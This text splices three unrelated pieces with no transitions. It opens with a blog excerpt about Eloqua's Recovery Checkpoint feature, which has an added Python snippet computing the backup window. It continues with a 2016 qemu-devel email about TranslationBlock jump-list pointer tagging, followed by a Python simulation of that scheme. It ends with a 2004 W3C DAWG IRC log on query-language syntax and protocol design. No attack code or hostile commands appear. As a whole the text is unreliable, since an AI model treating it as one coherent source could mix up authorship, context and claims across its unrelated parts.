I was reminded of the importance of backing up your files during this campaign. At one point, we needed to use the Recovery Checkpoint capability of Eloqua. If you’re not familiar with this feature, Eloqua saves local copies on your computer called Recovery Checkpoints. Any change to a landing page, including the title, images, text boxes, formatting, etc., qualifies for a new checkpoint to be created. You can restore to a checkpoint by clicking on the action menu (gear icon) in your landing page and then selecting Recovery Checkpoints. Eloqua will save the last twelve checkpoints. However, you need to be aware of some caveats. This feature depends on the use of the Firefox browser and only works on the same computer. Keep in mind that Eloqua automatically creates a recovery checkpoint every 10 minutes. That means that if you’re working on a file for over 2 hours, you will only have the last two hours’ worth of checkpoints to which you can return (i.e., 12 maximum checkpoints x a backup every 10 minutes = 120 minutes of backup).
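The checkpoint arithmetic works out like this (a trivial sketch; the interval and the twelve-checkpoint cap come straight from the paragraph above):

```python
# Back-of-envelope for Eloqua's Recovery Checkpoint window, using the
# numbers stated above: a checkpoint roughly every 10 minutes, and only
# the last twelve checkpoints kept.
CHECKPOINT_INTERVAL_MIN = 10
MAX_CHECKPOINTS = 12

def backup_window_minutes(interval=CHECKPOINT_INTERVAL_MIN,
                          kept=MAX_CHECKPOINTS):
    """How far back (in minutes) you can restore from checkpoints alone."""
    return interval * kept

print(backup_window_minutes())  # 120 minutes, i.e. two hours
```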
This campaign has benefited our business by providing our teams with greater insight into what Eloqua has to offer. Eloqua helped consolidate the number of different tools and technologies needed to implement our marketing campaign. Although it is too early to show the revenue impact this campaign is driving, we are already seeing tangible results!
https://community.oracle.com/groups/oracle-marketing-cloud-academy/blog/authors/Gary%20Elfert
On 24/03/16 16:42, Alex Bennée wrote:
>> diff --git a/include/exec/exec-all.h b/include/exec/exec-all.h
>> > index 05a151da4a54..cc3d2ca25917 100644
>> > --- a/include/exec/exec-all.h
>> > +++ b/include/exec/exec-all.h
>> > @@ -257,20 +257,32 @@ struct TranslationBlock {
>> >      struct TranslationBlock *page_next[2];
>> >      tb_page_addr_t page_addr[2];
>> >
>> > -    /* the following data are used to directly call another TB from
>> > -       the code of this one. */
>> > -    uint16_t tb_next_offset[2]; /* offset of original jump target */
>> > +    /* The following data are used to directly call another TB from
>> > +     * the code of this one. This can be done either by emitting direct or
>> > +     * indirect native jump instructions. These jumps are reset so that the TB
>> > +     * just continue its execution. The TB can be linked to another one by
>> > +     * setting one of the jump targets (or patching the jump instruction). Only
>> > +     * two of such jumps are supported.
>> > +     */
>> > +    uint16_t jmp_reset_offset[2]; /* offset of original jump target */
>> > +#define TB_JMP_RESET_OFFSET_INVALID 0xffff /* indicates no jump generated */
>> >  #ifdef USE_DIRECT_JUMP
>> > -    uint16_t tb_jmp_offset[2]; /* offset of jump instruction */
>> > +    uint16_t jmp_insn_offset[2]; /* offset of native jump instruction */
>> >  #else
>> > -    uintptr_t tb_next[2]; /* address of jump generated code */
>> > +    uintptr_t jmp_target_addr[2]; /* target address for indirect jump */
>> >  #endif
>> > -    /* list of TBs jumping to this one. This is a circular list using
>> > -       the two least significant bits of the pointers to tell what is
>> > -       the next pointer: 0 = jmp_next[0], 1 = jmp_next[1], 2 =
>> > -       jmp_first */
>> > -    struct TranslationBlock *jmp_next[2];
>> > -    struct TranslationBlock *jmp_first;
>> > +    /* Each TB has an assosiated circular list of TBs jumping to this one.
>> > +     * jmp_list_first points to the first TB jumping to this one.
>> > +     * jmp_list_next is used to point to the next TB in a list.
>> > +     * Since each TB can have two jumps, it can participate in two lists.
>> > +     * The two least significant bits of a pointer are used to choose which
>> > +     * data field holds a pointer to the next TB:
>> > +     * 0 => jmp_list_next[0], 1 => jmp_list_next[1], 2 => jmp_list_first.
>> > +     * In other words, 0/1 tells which jump is used in the pointed TB,
>> > +     * and 2 means that this is a pointer back to the target TB of this list.
>> > +     */
>> > +    struct TranslationBlock *jmp_list_next[2];
>> > +    struct TranslationBlock *jmp_list_first;
> OK I found that tricky to follow. Where does the value of the pointer
> come from that sets these bottom bits? The TB jumping to this TB sets it?

Yeah, that's not easy to describe. Initially, we set:

    tb->jmp_list_first = tb | 2

That makes an empty list: jmp_list_first just points to the this TB and
the low bits are 2. After that we can add a TB to the list in
tb_add_jump():

    tb->jmp_list_next[n] = tb_next->jmp_list_first;
    tb_next->jmp_list_first = tb | n;

where 'tb' is going to jump to 'tb_next', 'n' (can be 0 or 1) is an
index of jump target of 'tb'. (I simplified the code here)

Any ideas how to make it more clear in the comment?

Kind regards,
Sergey
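To make the tagged-pointer encoding concrete, here is a small Python simulation of the scheme described in the email. It is an illustration only, not QEMU code: dicts stand in for `TranslationBlock` structs, and an `(id, tag)` tuple stands in for a pointer whose low two bits carry the tag.

```python
# Simulation of QEMU's jmp_list tagged-pointer scheme (illustrative only).
# A "pointer" is an (tb_id, tag) tuple; tag 0/1 names which jump slot of
# the pointed-to TB continues the list, tag 2 means "back at the list head".

def new_tb(tb_id):
    tb = {"id": tb_id, "jmp_list_next": [None, None]}
    # Empty list: jmp_list_first points back to this TB with tag 2,
    # mirroring  tb->jmp_list_first = tb | 2  in the email.
    tb["jmp_list_first"] = (tb_id, 2)
    return tb

def tb_add_jump(tb, n, tb_next):
    """Link tb's jump slot n (0 or 1) into tb_next's jumping-TBs list."""
    tb["jmp_list_next"][n] = tb_next["jmp_list_first"]
    tb_next["jmp_list_first"] = (tb["id"], n)

def walk_jumpers(tbs, tb_next):
    """Yield (tb_id, jump_index) for every TB jumping to tb_next."""
    ptr = tb_next["jmp_list_first"]
    while True:
        tb_id, tag = ptr
        if tag == 2:          # pointer back to the list's target TB: done
            return
        yield tb_id, tag      # tag 0/1 = which jump slot of tb_id is used
        ptr = tbs[tb_id]["jmp_list_next"][tag]

tbs = {i: new_tb(i) for i in range(3)}
tb_add_jump(tbs[1], 0, tbs[0])   # TB 1 jumps to TB 0 via its jump slot 0
tb_add_jump(tbs[2], 1, tbs[0])   # TB 2 jumps to TB 0 via its jump slot 1
print(list(walk_jumpers(tbs, tbs[0])))  # [(2, 1), (1, 0)]
```

Walking TB 0's list visits the most recently added jumper first, exactly as the prepend in `tb_add_jump()` implies.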
https://lists.gnu.org/archive/html/qemu-devel/2016-03/msg05833.html
IRC log of dawg on 2004-09-17
Timestamps are in UTC.
08:51:01 [RRSAgent]
RRSAgent has joined #dawg
08:51:18 [kendallc]
i don't think so, re: news
08:51:23 [AndyS]
Map to optional : issue is that variables would get bound
08:52:52 [kendallc]
i'll point ericp to it when the disjunction discussion slows down
08:53:11 [AndyS]
Some cases (many?) can be done by value disjunction
08:54:04 [AndyS]
(example on screen)
08:54:46 [AndyS]
JF: Very difficult for implementations
08:54:54 [kendallc]
q?
08:54:59 [AndyS]
(scribe agreeds - needs data flow analysis of query - not syntax)
08:55:36 [rob]
trickier example would be get people who are either of type "doggowner" or own a pet whose type is a dog
08:55:41 [ericP]
q?
08:55:54 [AndyS]
ack, kendallc
08:55:55 [AlbertoR]
AlbertoR has joined #dawg
08:56:01 [DaveB]
let me paste the examples
08:56:08 [DaveB]
4. Want at least one of them with the constraint
08:56:08 [DaveB]
ASK
08:56:08 [DaveB]
OPTIONAL (?person rdf:type Engineer)
08:56:08 [DaveB]
OPTIONAL (?person rdf:type Manager)
08:56:09 [DaveB]
(?person ex:age ?age)
08:56:11 [DaveB]
WHERE
08:56:13 [rob]
kendall: how much of opt difficulty is just
08:56:13 [DaveB]
?age >20
08:56:15 [JanneS]
JanneS has joined #dawg
08:56:17 [AndyS]
Kendall: Hard to implement?
08:56:18 [DaveB]
=> YES
08:56:22 [DaveB]
and
08:56:23 [DaveB]
5. Re-expression of 4 using value disjunction
08:56:25 [DaveB]
ASK
08:56:27 [DaveB]
(?person ex:age ?age)
08:56:29 [DaveB]
(?person rdf:type ?type)
08:56:31 [DaveB]
WHERE
08:56:33 [DaveB]
(?type = Engineer OR ?type = Manager) AND
08:56:35 [DaveB]
?age > 20
08:56:39 [DaveB]
=>
08:56:41 [DaveB]
YES
08:57:32 [kendallc]
how much of the optimization worries are due to SteveH's sql-based implementation strategy. That is, I'm wondering how general they are.
08:57:34 [AndyS]
Steve: would simply expand all cases to one (large!) SQL query
08:57:45 [JFBaget]
JFBaget has joined #dawg
08:58:01 [DaveB]
steve worried about optimising
08:59:12 [rob]
eric: optimizations can hurt soundness and completeness\
08:59:22 [rob]
i.e. optimization can introduce bugs
08:59:23 [AndyS]
Jos: its a requirement (3.13)
08:59:37 [ericP]
ack Yoshio
08:59:37 [Zakim]
Yoshio, you wanted to ask what empty WHERE means
08:59:50 [kendallc]
zakim, q-
08:59:50 [Zakim]
I see no one on the speaker queue
08:59:50 [AndyS]
ack kendallc
08:59:51 [rob]
yoshio: what does empty where clause mean?
09:00:10 [AndyS]
DaveB: was a typo
09:00:19 [JFBaget]
zakim, q+
09:00:19 [Zakim]
I see JFBaget on the speaker queue
09:00:26 [rob]
yoshio: with optional at top and no other where terms..
09:00:29 [JosD]
q+ to point to requirement 3.13 RDF Graph Pattern MatchingDisjunction
09:01:22 [rob]
yoshio: select ?x where optional (?x, ?x ?x)
09:01:33 [rob]
anday: return one row one column
09:01:53 [rob]
andy: using construct instead of select in that query migght return an error
09:02:12 [ericP]
q?
09:02:15 [rob]
steve: with construct, if x isn't bound result is empty doc
09:02:35 [ericP]
ack JFBaget
09:03:05 [ericP]
q+ ericP
09:03:15 [rob]
jf: implementation will have two components graph matching and then constraints.
09:03:20 [ericP]
q-
09:03:38 [ericP]
q+ ericP to ask if optimization is a criteria for success
09:03:38 [rob]
jf: will bbe much more efficieent to be able to put disjunction in first step
09:03:51 [rob]
jf: we know algorithms tto do disjunction
09:04:07 [rob]
steve: y system doesn't separate those two steps as explicitly
09:04:37 [rob]
steve: simple constraints are used to prune graph matchin stage in my system
09:05:02 [ericP]
ack JosD
09:05:02 [Zakim]
JosD, you wanted to point to requirement 3.13 RDF Graph Pattern MatchingDisjunction
09:05:27 [rob]
(examples are being typed up ffor later review)
09:05:44 [rob]
jos: 3.13 requires disjunction
09:06:00 [rob]
steve: but optional might meet those needs
09:06:28 [rob]
3.13 was proposed and accepted during a face-to-face\
09:07:13 [rob]
steve: process error that it was accepted that way
09:07:15 [ericP]
q?
09:09:03 [rob]
eric: let's get example where optional isn't good enough
09:09:09 [rob]
andy: and let's post it to the email list
09:11:08 [rob]
action: rob to do stuff
09:11:21 [rob]
steve to own disjunction issue
09:11:29 [ericP]
ack ericP
09:11:29 [Zakim]
ericP, you wanted to ask if optimization is a criteria for success
09:12:22 [rob]
eric: how do we balance expressiveness with implementation and optimization ease
09:12:48 [rob]
kendall: it should be some kind of concern
09:13:02 [ericP]
q?
09:13:22 [kendallc]
if the optimization worries are generalizable, then yes, it's a real concern. but i don't know that and no one has claimed it.
09:13:41 [rob]
state of art is triple-based, not graph matchin based
09:14:59 [rob]
janne: in SQL, some queries just perfform poorly
09:15:09 [rob]
steve: in SQL you can tell which ones will perfform poorly
09:16:02 [rob]
straw poll: who wants to drop disjunction
09:16:11 [rob]
4 in favor (reluctat fifth
09:16:59 [rob]
three or four against
09:17:21 [DanC_lap]
DanC_lap has joined #dawg
09:17:40 [rob]
DanC has joined th meeting and is taking over as chair
09:19:01 [rob]
danc: let's update issues list at break
09:19:15 [rob]
danc: f2f meeting schedule
09:19:57 [rob]
danc: we ffinally know tech plenary date; let's meeet efore end of feb
09:20:13 [rob]
dan: booked to end of year
09:20:27 [rob]
steve: considered hosting ( inUK)
09:20:33 [ericP]
yoshio, should we drag everyone to japan?
09:20:39 [rob]
kendall: possibly in DC
09:20:47 [rob]
janne: finland, anyone?
09:20:47 [Yoshio]
in January?
09:21:25 [Yoshio]
If we plan to use Keio room, I think January is not a good month (entrance exam)
09:21:36 [ericP]
oo, good point
09:21:40 [rob]
It's everyody's favorite game, the Scheduling Game! Hooray!!!
09:25:41 [rob]
19-20 Jan looks liike a good tiime; kendall will consider DC
09:26:14 [rob]
action: kendall to consider DC
09:26:31 [rob]
action janne to consider hosting f2f\
09:26:39 [rob]
action: janne to considerhosting f2f
09:26:47 [rob]
action: steve to consider hosting f2f
09:27:02 [rob]
dan: moving on to telecon times
09:27:11 [rob]
dan: same time boston time?
09:27:17 [rob]
yoshio: NOOOOOOO!
09:27:49 [kendallc]
Janne: how about a meeting in Tampere? :>
09:27:54 [kendallc]
sounds insanely cool there
09:27:54 [rob]
(this is partly over daylight saings time change)
09:33:03 [JanneS]
Hmm, Tampere is 200kms (130miles) North from my home and office... could do, though, if you insist.
09:33:19 [kendallc]
:>
09:34:04 [rob]
danc: agreed to meet 1430 utc
09:34:30 [rob]
kendall: dan is being mean to people not here
09:34:54 [kendallc]
it's just a meaningless point to make, give yr input if yr not gonna be here. it wouldn't make a bit of difference to the decision.
09:34:57 [rob]
resolved to meet 1430 utc, no abstaintions no objections
09:35:22 [rob]
no meeting 21st
09:35:27 [rob]
next meetingg 28th
09:35:50 [rob]
scribe for 28th sept: janne
09:36:07 [rob]
f2f proposals expected before that meeting
09:37:04 [rob]
This concluded this exciting edition of the Scheule Game! thanks forplaying
09:37:10 [rob]
break
09:37:17 [rob]
scribe affter reak: ericp
09:58:24 [ericP]
[resume]
09:58:40 [ericP]
[BRQL grammar discussion]
09:59:16 [DaveB]
DARQ grammar discussion....
10:00:18 [ericP]
oh right, DARQ
10:01:57 [kendallc]
for example, the parents and instances of a class or the class tree.
10:03:53 [ericP]
Andy: issues around nesting...
10:04:29 [ericP]
... constraints can show up in lots of places
10:05:41 [ericP]
[Andy gives a tour of two syntax variants]
10:07:16 [ericP]
... are there other choices?
10:07:28 [ericP]
SteveH: not allow in-line constraints
10:07:28 [kendallc]
oops
10:10:05 [ericP]
example for Andy:
10:10:07 [ericP]
SELECT ?mbox ?name ?name2
10:10:07 [ericP]
FROM <file:D.n3>
10:10:07 [ericP]
WHERE
10:10:07 [ericP]
{ ?x foaf:mbox ?mbox .
10:10:09 [ericP]
?x foaf:number ?n . ?n < 30 .
10:10:12 [ericP]
OPTIONAL { ?x foaf:name ?name } .
10:10:14 [ericP]
OPTIONAL { ?x foaf:knows ?y . OPTIONAL { ?y foaf:name ?name2 } . }
10:10:17 [ericP]
}
10:12:19 [ericP]
SteveH asks for block-based OPTIONAL graphs
10:12:42 [ericP]
Andy: are you prepared to do data-flow analysis
10:12:51 [ericP]
SteveH: already do it for RDQL
10:14:53 [SteveH]
q+ to talk about trivalue logic
10:19:04 [ericP]
[DaveB proposes 4 syntax alternatives]
10:19:25 [ericP]
DaveB: let's stay close to RDQL 'cause people are using it now.
10:22:42 [ericP]
Andy: what RDQL query would *not* fit in [DaveB's forth proposal] ?
11:04:39 [ericP]
[break]
11:05:09 [ericP]
[Andy presents syn-prop.txt]
11:07:19 [ericP]
Andy asks about conjunctive constraints
11:07:40 [ericP]
SteveH has a prob with constraints applied to a block
11:09:29 [ericP]
... specifically, source applied to a multiple triples
11:10:04 [ericP]
prefix vs. using
11:10:24 [ericP]
Andy prefers prefix (before use) for single pass
11:10:36 [DaveB]
DaveB +1 to PREFISX
11:10:37 [ericP]
SteveH feels that it clutters the query.
11:10:49 [ericP]
eric{ +1 to PREFISX
11:12:17 [ericP]
SteveH withdraws objection to prefix
11:13:17 [ericP]
DanC: i'd like andyS to be less democratic
11:13:35 [ericP]
DaveB opposes nested optionals
11:13:49 [ericP]
... + SOURCE attached to triple
11:15:57 [ericP]
... can't see block boundries with the ANDs in the graph
11:17:01 [ericP]
EricP: what is your [DabveB
11:17:11 [ericP]
] objection to nested optionals
11:17:19 [ericP]
DaveB: doesn't seem required
11:17:29 [ericP]
Alberto: why not use quads
11:17:43 [ericP]
Andy: can make QL work but...
11:18:31 [ericP]
... What do you return when the triple comes from two models?
11:18:51 [ericP]
Alberto and SteveH return two solutions
11:23:23 [kendallc]
(s p o :prop value) -- colon doesn't work, but some other prefix might
11:23:33 [rob]
steve: use of 'as' as keyword
11:23:37 [kendallc]
(s p o prop=value) would, I guess
11:24:05 [rob]
andy: this sounds like starting over; making triples data objects in themodel
11:24:32 [rob]
dave: putting source riht next to the triple is the simplest solution
11:25:26 [rob]
staw poll: is it worth 'reinventing the universe' to come up with a robust way to handle 'source'?
11:25:41 [rob]
(consensus no, I think)
11:26:45 [rob]
andy: makes sense to be able to put 'and' blocks anywhere
11:28:12 [rob]
general agreement that ability to move any block anywhere in a where clause (becausee it's just a conjunction which is commutative)
11:28:17 [rob]
...is good
11:28:40 [rob]
dan: is source on just one triple good enough?
11:29:04 [rob]
steve: you can just tack the same thing onto multiple triples, and you can do the more general thing
11:29:50 [rob]
andy: weird that optionals are square brackets and eveything else is keywords
11:30:25 [rob]
kendall: consistency good
11:31:22 [rob]
andy: nested optionals can always be "distributed" out to top level\
11:31:44 [rob]
eric: anyone other than steve object to nested optionals?
11:31:55 [rob]
weakly object: jos dirk
11:32:07 [rob]
strongly for nested optionals andy
11:32:14 [rob]
weakly for: ericp, yoshio
11:33:08 [rob]
andy: wwith just an optional keyword, you make nested optionals impossible
11:33:36 [DanC_lap]
Steve: ah... "nested optionals in the future" is a convincing argument.
11:33:36 [kendallc]
rob, yr scribing makes me sound like Semantic Caveman... "consistency good; rob bad!" :>
11:35:12 [rob]
eric: any optional-supporters not content with planning for future nested optional syntax, but not including nested optionals as a feature?
11:36:02 [rob]
(nobody shouts too loudly)
11:37:02 [rob]
(expanding sample syntax to a query with multiple optional blocks)
11:37:35 [rob]
eric: how about using variables in different optional blocks?
11:37:46 [rob]
steve: the constraints are complex...
11:38:41 [rob]
ericp: let's let the editor put this example together and email it
11:39:15 [rob]
Rob expressed objection to this syntax
11:39:29 [rob]
6 in favor of this syntax
11:39:46 [rob]
two are ambivalent (orr abstainging or something)
11:40:24 [rob]
note that this is just a straw poll
11:40:32 [rob]
lunch time!
11:42:54 [rob]
rob: languages that explicitly declare variables make variables in otpionaltype bocks simpler, because scopin is straightforward
11:45:03 [DanC_lap]
break for lunch.
12:23:33 [shellac]
shellac has joined #dawg
12:35:08 [Zakim]
Zakim has left #dawg
12:40:33 [rob]
rob has joined #dawg
12:45:09 [DanC_lap]
starting to boot up after lunch...
12:45:22 [DanC_lap]
excused: JosD, JanneS
12:45:53 [AndyS]
AndyS has joined #dawg
12:46:27 [Yoshio]
Yoshio has joined #dawg
12:49:01 [kendallc]
12:49:03 [JanneS]
I'm excused.
13:04:19 [DaveB]
resuming
13:04:23 [DaveB]
publication schedule
13:04:44 [DaveB]
AndyS busy 20-24Sep
13:05:30 [DaveB]
avail 27Sep-1Oct
13:05:53 [DaveB]
DONM 28th Sep
13:06:41 [DaveB]
SteveH and DaveB offered reviews
13:06:47 [DaveB]
DanC will look for more later
13:07:16 [DaveB]
poss publication 35th Sept
13:07:18 [AlbertoR]
AlbertoR has joined #dawg
13:07:29 [DaveB]
also known as Oct5th
13:08:15 [DaveB]
DECISION to publish Oct5th based on reviews from 28thSep
13:08:29 [DanC_lap]
i.e. folks should expect a decision; we didn't just make one
13:09:22 [AndyS]
Editting finished by Oct 1
13:11:19 [DaveB]
discussion of the issues list
13:11:31 [DanC_lap]
ACTION DanC: talk with Kendall about issues list maintenance
13:12:14 [DaveB]
ACTION DanC: add a pointer to the issues list to the DAWG home page (if it isn't there)
13:12:34 [DaveB]
new name candidates
13:13:49 [DaveB]
added to the issues list item
13:14:02 [DaveB]
looking at
13:14:28 [DaveB]
protocol
13:17:29 [DanC_lap]
13:17:34 [DanC_lap]
"source of a triple" thread
13:18:14 [DaveB]
digression to xml format for results
13:20:16 [DaveB]
DaveB - xml result format, would take it and make skeletal doc, add schema
13:20:20 [DaveB]
maybe rename to match terms
13:20:26 [DaveB]
EricP - prefer tesrseer
13:20:28 [DaveB]
terser
13:20:53 [DaveB]
SteveH - like tr and td and th idea
13:20:59 [DaveB]
DaveB - will think about that
13:21:26 [DaveB]
maybe put in a namespace
13:21:49 [DaveB]
DanC - give it a or namespace else say why not
13:21:56 [DaveB]
Alberto - +datatype & lang
13:22:16 [DaveB]
EricP - argument for namespace - may want to later on add extra annotations such as proof. compositiblity
13:23:49 [DaveB]
flat
13:24:03 [DaveB]
DanC - protocol doc
13:24:17 [DaveB]
what would I put to say to a competent programmer to do this protocol
13:25:03 [DaveB]
DaveB - recipe style
13:25:35 [DaveB]
Kendall - joseki with some (not many) changes
13:25:35 [ericP]
<Result>
13:25:35 [ericP]
<tr><th>?name</th><th>?email</th></tr>
13:25:35 [ericP]
<tr><td xml:Bob</td><td resource="
mailto:bob@toy.example
"/></tr>
13:25:35 [ericP]
</Result>
13:25:49 [AndyS]
rdf:datatype=""
13:25:58 [DaveB]
Kendall - identifying server query points and models
13:26:54 [Yoshio]
re: tr, th approach Mmm, I don't like it. those tags doesn't bear the meanings
13:26:54 [ericP]
RDF Net API:
13:26:59 [DaveB]
and
13:27:45 [DaveB]
looking at QUERY: HTTP GET
13:28:07 [DaveB]
the URI without the ?query_string gets the model in a syntax [rdf/xml?]
13:28:21 [DaveB]
Kendall - confused about that; sending query to a graph, plus also haveing FROM in the QL
13:28:52 [DaveB]
SteveH - similar thing to this, no model stuff
13:29:15 [DaveB]
AndyS - FROM is really for the local case
13:29:45 [DaveB]
Algae has from
13:30:41 [DaveB]
EricP - annotaa does the getting the model when there is no Q like Joseki
13:30:49 [DaveB]
AndyS - you can say you don't support that
13:31:23 [DaveB]
ref to Atom Protocol work
13:31:31 [DaveB]
take some of the good points from there
13:31:51 [DaveB]
atompub ietf wg
13:32:03 [kendallc]
13:32:59 [DaveB]
DanC initution is that the no-querystring result should be documentation (html)
13:33:05 [DaveB]
maybe machiner eadbale
13:33:49 [DanC_lap]
no, not html.
13:33:55 [DanC_lap]
a service description.
13:34:28 [DanC_lap]
e.g. { <> a :Service; :expertIn :Biology, :Finance; :authoritativeOn :Kingdom, :Phylum, :stockPrice }.
13:34:45 [kendallc]
13:37:03 [kendallc]
13:37:58 [DaveB]
draft of autodiscovery for finding a feed from a w web page
13:38:21 [kendallc]
Atom API Quick Reference
13:38:22 [kendallc]
13:38:26 [kendallc]
that's pretty good, actually
13:39:23 [DaveB]
kendall was going to go write a protocool design doc
13:39:38 [DaveB]
DanC - what's new is services ...
13:39:55 [DaveB]
... marketplace here - can you convince these services to conform to this
13:40:48 [DaveB]
ACTION Kendall: write a protocol document draft
13:40:57 [ericP]
Annotea protocol -->
13:41:10 [AlbertoR]
+1 Kendall
13:41:23 [DaveB]
EricP - my code does this annotea protocol
13:41:35 [AlbertoR]
I can help to review the doc
13:41:52 [DaveB]
POST to make a doc, GET to get it (sic)
13:42:07 [DaveB]
query the service about a doc
13:42:47 [DaveB]
looking at
13:42:57 [DaveB]
but doesn't show the url encoding of the algae query
13:43:32 [DaveB]
DanC - not customised for info for us; re URLs
13:43:43 [DaveB]
EricP - issues brouguht up - querying a document or querying a service?
13:43:52 [DaveB]
... seems to be we are prefering querying a service
13:43:55 [DaveB]
... ISSUE
13:44:15 [DanC_lap]
NEW ISSUE: protocol URIs are for services or for document/graph/models?
13:45:01 [DaveB]
Kendall - starting from Joseki, first thing I want to address is the above issue
13:45:10 [DaveB]
... "What are you sending your query to?"
13:45:25 [TomAdams]
TomAdams has joined #dawg
13:46:06 [DaveB]
EricP - other issue ... if you are sending a query to the service not to the document....
13:47:19 [DaveB]
... REST FAQ
13:47:42 [DaveB]
... CGI url-encoded the params
13:49:13 [ericP]
GET /service?rq23=SELECT * FROM <../doc1> WHERE (?s ?p ?o)
13:49:41 [DanC_lap]
ACTION 7 = KendallC: draft a protocol document (est delivery in 1 month)
13:50:12 [DaveB]
discussion of FROM in the QL
13:50:23 [ericP]
GET /service?from=../doc1&rq23=SELECT * WHERE (?s ?p ?o)
13:51:28 [ericP]
GET /doc1&rq23=SELECT * WHERE (?s ?p ?o)
13:52:19 [DaveB]
comparing to GET index.tmpl?page=12345
13:53:21 [DaveB]
and URIs like /index.tmpl/12345
13:53:33 [DanC_lap]
(evolution of ?foo is not in URI-space, where as evolution of /doc1 and /service is)
13:54:18 [DaveB]
EricP - if we send a queyr to the document rather than service, we loose some of the document compositibility possibilities
13:54:39 [Yoshio]
+1
13:54:45 [DaveB]
however it's easy to see how to do this lke a ,rdf-query=.... suffix to a web page (W3C tech)
13:55:17 [DanC_lap]
ACTION ericp: follow up on " if we send a queyr to the document rather than service, we loose some of the document compositibility possibilities" in email
13:55:25 [DaveB]
querying an aggregation - give it a uri
13:55:54 [DaveB]
new item
13:55:59 [DaveB]
border of query language and protocol
13:56:24 [DanC_lap]
"source of a triple"
13:57:20 [DaveB]
DanC presents email above
13:57:21 [dirkx]
dirkx has joined #dawg
14:00:36 [danbri_dna]
danbri_dna has joined #dawg
14:01:02 [DaveB]
data + rdfs rules & applying the query
14:02:13 [DaveB]
let's not bind ?src to a.rdf, when it's not the graph you qyer
14:02:15 [DaveB]
query
14:02:47 [DaveB]
... the graph queried is triples in a.rdf + more triples made by inferencing
14:03:07 [DaveB]
AndyS - it's something else and important, so give it a different URI
14:03:23 [rob]
I think it's an extremely bad idea to standardize anything which is expected to read a language definition as input and also process that language...Goedel said a few things about the generality of this approach...
14:03:37 [DaveB]
SteveH - provenance issue also - was it said or implied
14:10:28 [DaveB]
point is, to keep a.rdf and it's rdfs closure distinct
14:11:33 [DaveB]
currently we have source that in FROM is the URI of documents
14:11:49 [DaveB]
but SOURCE that is the graph (?)
14:13:23 [DaveB]
ref to section 10
14:13:33 [Yoshio]
Hmm, as long as we don't have a name for a graph, what can we do?
14:13:43 [DaveB]
... to query pattern GP on G+mapping from URIs to graphs (or resources to grpah)
14:13:49 [DaveB]
[need to think more, DanC]
14:15:45 [ericP]
Yoshio, my guess is we can get away withont a name for the graph
14:15:57 [DaveB]
agenda review
14:16:43 [rob]
kendallc ok, this sucks, but it's at least different:
14:16:43 [rob]
kendallc It should be possible to query an RDF graph to find the parents,
14:16:43 [rob]
kendallc children, and instances of a class, as well as the types and
14:16:43 [rob]
kendallc properties of instances. Syntactic sugar for these kinds of query
14:17:15 [rob]
kendallc shall be considered to satisfy this objective.
14:17:57 [DaveB]
ground facts
14:18:35 [DaveB]
Kendall - kind of schema queries that rdf schema editor tools
14:18:39 [Yoshio]
query such things to a RDF graph? whta objective? (I lost the context)
14:18:47 [DaveB]
... like all the jena methods (above) for querying models [for schema info]
14:18:48 [DanC_lap]
q+
14:19:38 [DaveB]
EricP - might be a mechanism that looks like the extension mechanism for other features
14:19:43 [DaveB]
isGroundFactOf()
14:20:01 [DaveB]
AndyS - in Jena, two places comes up - in Ontology API
14:20:09 [DaveB]
where you are actually looking at the Ontology
14:20:17 [DaveB]
such as in an ontology editor
14:20:23 [TomAdams]
TomAdams has joined #dawg
14:20:26 [DaveB]
other place is in the rules engine
14:20:43 [DaveB]
when you want to write a rule that does direct subclass/not
14:20:53 [DaveB]
and does this via magic properties
14:20:55 [DaveB]
no reall other choice
14:21:01 [DaveB]
if you only have triples
14:21:06 [DaveB]
</AndyS>
14:21:17 [DaveB]
SteveH: could have a keyworrd GROUND
14:21:25 [DaveB]
AndyS or FROM on a triple
14:21:35 [DaveB]
like tucana does
14:22:37 [DaveB]
I see serql has {X} serql:directSubClassOf {Y}
14:22:40 [DaveB]
etc
14:24:00 [DanC_lap]
kc on 4.6
14:24:09 [kendallc]
SeRQL and RQL both have this kind of support
14:25:51 [DaveB]
go in as a use case?
14:26:23 [DaveB]
some people want that
14:28:33 [DaveB]
RobS could get the inferencer to add extra triples/properties to describe what is/isn't ground
14:31:19 [DanC_lap]
discussion of 4.6 shows support for the ontology editor use-case, but not much support for any paticular objective
14:32:40 [DanC_lap]
ACTION KendallC: provided updated UC&R as candidate for publication. [due in the next 2 to 3 weeks, in time to get the WG to decide on 5 Oct]
14:33:14 [DanC_lap]
DONE: ACTION Kendall: Pester Aditya about scheme/metascheme query support re: SWOOP
14:33:24 [AndyS]
14:34:16 [DanC_lap]
DONE: TomA: finding a use-case for distinguishing direct and indirect transitive predicates.
14:34:38 [TomAdams]
I've asked some of customers for input on this, no reply to date.
14:35:08 [TomAdams]
I wouldn't really call it a use case, just a statement of what we've implemented, and how it's exposed.
14:38:32 [AlbertoR]
14:38:40 [DanC_lap]
that's good enough for us, TomA
14:39:00 [DaveB]
from source mean different things?
14:39:35 [DaveB]
service, document, graph
14:39:47 [DaveB]
FROM is service|document but also graph?
14:39:55 [DaveB]
SOURCE deals with a graph?
14:40:45 [DaveB]
AndyS - FROM makes a graph from URIs given in the FROM
14:40:51 [DaveB]
whereas SOURCE refers to that graph
14:40:58 [DaveB]
Alberto - FROM is the graph
14:41:06 [DaveB]
... the protocol action
14:41:10 [DaveB]
... wherase SOURCE is about the graph
14:41:49 [DaveB]
... here some property dc:source could related a document and a graph
14:41:54 [DaveB]
... or dawg:source
14:41:58 [DaveB]
DanC - like log:semantics
14:42:42 [DaveB]
graphs seem to be in the data model
14:43:53 [DaveB]
request to write a query that uses FROM that cannot be done with SOURCE
14:44:18 [DaveB]
Alberto - virtual graphs such as in the foaf personal example from Alberto
14:45:09 [DanC_lap]
ACTION Alberto/Steve: edit the examples in
into test cases (either positive or negative tests)
14:45:34 [DaveB]
tests
14:46:16 [DanC_lap]
break for :15
15:25:04 [DaveB]
well, 15ish
15:26:25 [DanC_lap]
-- resume
15:26:38 [DaveB]
we're back
15:27:10 [DaveB]
4.2 & 4.5 pending
15:27:30 [DaveB]
Kendall - consolidate 4.2 & 4.5
15:27:55 [DaveB]
RobS - think we have accepted them as objectives
15:28:38 [kendallc]
andy thinks they are diff
15:29:50 [DaveB]
4.2 doesn't talk about the target of a query
15:29:57 [DaveB]
or querying
15:30:01 [Yoshio]
4.2== SOURCE, 4.5 == FROM?
15:30:09 [DaveB]
4.5 specifying more than one target, more about the input side of the query
15:30:26 [DaveB]
AndyS ... 4.2 allows you to get the information out
15:31:07 [DaveB]
Alberto see as FROM, where you get the data - merge
15:31:25 [DaveB]
